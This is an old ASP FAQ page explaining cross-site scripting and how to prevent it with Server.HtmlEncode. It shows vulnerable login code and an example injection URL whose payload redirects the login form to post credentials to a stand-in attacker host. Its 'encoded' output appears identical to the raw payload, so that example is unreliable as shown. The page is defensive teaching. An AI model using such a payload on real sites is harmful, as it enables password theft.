When you think ASP, think...
Recent Articles
All Articles
ASP.NET Articles
ASPFAQs.com
Message Board
Related Web Technologies
User Tips!
Coding Tips

Sections:
Sample Chapters
Commonly Asked Message Board Questions
JavaScript Tutorials
MSDN Communities Hub
Official Docs
Security
Stump the SQL Guru!
XML Info
Information:
Feedback
Author an Article
ASP ASP.NET ASP FAQs Message Board Feedback

The 4 Guys Present: ASPFAQs.com

Jump to a FAQ
Enter FAQ #:
..or see our 10 Most Viewed FAQs.

4GuysFromRolla.com : ASP FAQS : Security


Question:

What is the Cross Site Scripting security vulnerability? Am I at risk? How do I plug this security hole?


[Print this FAQ]

Answer: (This content is borrowed from Craig Atkin's article: Data Sanitization - Reducing Security Holes in an ASP Web Site...)

What is Cross Site Scripting?
Cross Site Scripting is a vulnerability that occurs when a Web site displays user input in the browser that has not been properly sanitized. Cross Site Scripting can be used to steal cookies, compromise data integrity, and trick users into submitting information to a hacker.

Consider a Web application that requires users to log in to visit a "secure" area. When logging in, users have to present their credentials - a username/password pair. All of the valid username/password pairs are maintained in a database. When the user wishes to view a secure area, she must provide her username and password, which is then checked to see if it exists within the user database table.

Now, imagine that this login system was comprised of two pages: Login.asp, which created a form for the user to enter their username and password, and the page CheckCredentials.asp, which checked to see if the user's supplied username/password were valid. Now, imagine that in the case that the credentials were invalid, CheckCredentials.asp uses a Response.Redirect to send the user back to Login.asp, passing along in the querystring an errorMessage string, like so:

CheckCredentials.asp
If rs.eof then
'user's credentials are not valid
Response.Redirect("Login.asp?errorMessage=Invalid+username+or+password")
Else
'user's credentials are valid, log them into the site...
End If

Then, in Login.asp, the errorMessage querystring value would be displayed as follows:

Login.asp
<form method="POST" action="CheckCredentials.asp">
<!-- display error message, if it exists -->
<%=request.querystring("errorMessage")%>

Username: <input type="text" name="UserName"><br>
Password: <input type="password" name="Password"><br>
<input type="submit" name="submit" value="log in!">
</form>

Using this (unsafe) technique, if the user attempts to login with invalid credentials, they are returned to Login.asp and are displayed a short message explaining that their credentials were invalid. A clever hacker, though, could realize that he could alter the actual HTML of the page by providing a errorMessage value that contains HTML markup. For example, imagine that you visited Login.asp using the following URL:

http://www.somesite.com/Login.asp?errorMessage=</form><form method="POST" action="www.hax0r.com/passwordstealer.asp">

As we saw in the code for Login.asp, the errorMessage querystring value will be emitted, producing an HTML page with the following markup:

Login.asp
<form method="POST" action="somepage.asp">
</form><form method="POST" action="http://www.hax0r.com/stealPassword.asp">

Username: <input type="text" name="UserName"><br>
Password: <input type="password" name="Password"><br>
<input type="submit" name="submit" value="log in!">
</form>

The hacker has cleverly inserted some HTML into this page so that if an honest user were to visit the page with the supplied errorMessage querystring value, their supplied username and password would be submitted to the page http://www.hax0r.com/stealPassword.asp.

The hacker could now send a link to his contrived page via an email message, or a link from some message board site or what not, hoping that a user of the site will click on the link and attempt to login. Of course, by attempting to login, the user will be submitting his data to the hacker's site. (The proper encoding of the errorMessage querystring value in the URL would be: http://www.ourdomain.com/login.asp?errormsg=%3C%2Fform%3E%3Cform+method%3D%22POST%22+action%3D%22http://www%2Ehax0r%2Ecom%2FstealPassword%2Easp%22%3E.) The hacker "wins" if he can find someone who is tricked by this, clicks on his link, visits our Web site, and attempts to login, thereby sending their username/password to the hacker's Web site.

How do we Protect Against Cross Site Scripting?
Protecting against a Cross Site Scripting attack is relatively simple: simply use the Server.HtmlEncode method. Server.HtmlEncode takes a string and replace any characters that the browser will try to interpret with HTML encoding, so that the browser will print the characters to the screen. For example, if we call the Server.HtmlEncode method passing in:

</form><form method="POST" action="www.hax0r.com/passwordstealer.asp">

The resulting string will be:

</form><form method="POST" action="www.hax0r.com/passwordstealer.asp">

To change our original code to use html encoding, we need to change the line that prints the value of errorMessage from <%=request.querystring("errorMessage")%> to <%=server.htmlencode(request.querystring("errormsg"))%>

Once again, sanitization of data that is passed back to the browser should be performed on all data that has passed from an insecure source (the client). We should also sanitize any data that comes from any source and is passed back to the browser, as a hacker could break into our database/file system, insert his code into the correct record/file, and compromise our Web site in that manner. For a good article on Cross Site Scripting attacks, see: The Cross Site Scripting FAQ.

More information on security vulnerabilities in web applications can be found at: http://www.owasp.org/asac


FAQ posted by Scott Mitchell at 11/26/2002 10:44:16 PM to the Security category. This FAQ has been viewed 45,510 times.

Do you have a FAQ you'd like to suggest? Suggestions? Comments? If so, send it in! Also, if you'd like to be a FAQ Admin (creating/editing FAQs), let me know! If you are looking for other FAQs, be sure to check out the 4Guys FAQ and Commonly Asked Messageboard Questions!

Most Viewed FAQs:

1.) How can I format numbers and date/times using ASP.NET? For example, I want to format a number as a currency. (761643 views)
2.) I am using Access and getting a 80004005 error (or a [Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine cannot open the file '(unknown)' error) when trying to open a connection! How can I fix this problem? (207777 views)
3.) How can I convert a Recordset into an array? Also, how can I convert an array into a Recordset? (202549 views)
4.) How can I quickly sort a VBScript array? (196039 views)
5.) How can I find out if a record already exists in a database? If it doesn't, I want to add it. (156019 views)
6.) How do I display data on a web page using arrays instead of Do...While...MoveNext...???... (152331 views)
7.) When I get a list of all files in a directory via the FileSystemObject, they aren't ordered in any reasonable way. How can I sort the files by name? Or by size? Or by date created? Or... (140381 views)
8.) For session variables to work, must the Web visitor have cookies enabled? (110162 views)
9.) Can I send emails without using CDONTS? (107083 views)
10.) How can I take the result of a SELECT...MULTIPLE or a group of same-named checkboxes and turn it into a query? That is, if the user selects 3 answers, how can I construct a query that looks for all 3? (106308 views)
Last computed at 9/17/2007 3:22:00 AM


ASP.NET [1.x] [2.0] | ASPMessageboard.com | ASPFAQs.com | Advertise | Feedback | Author an Article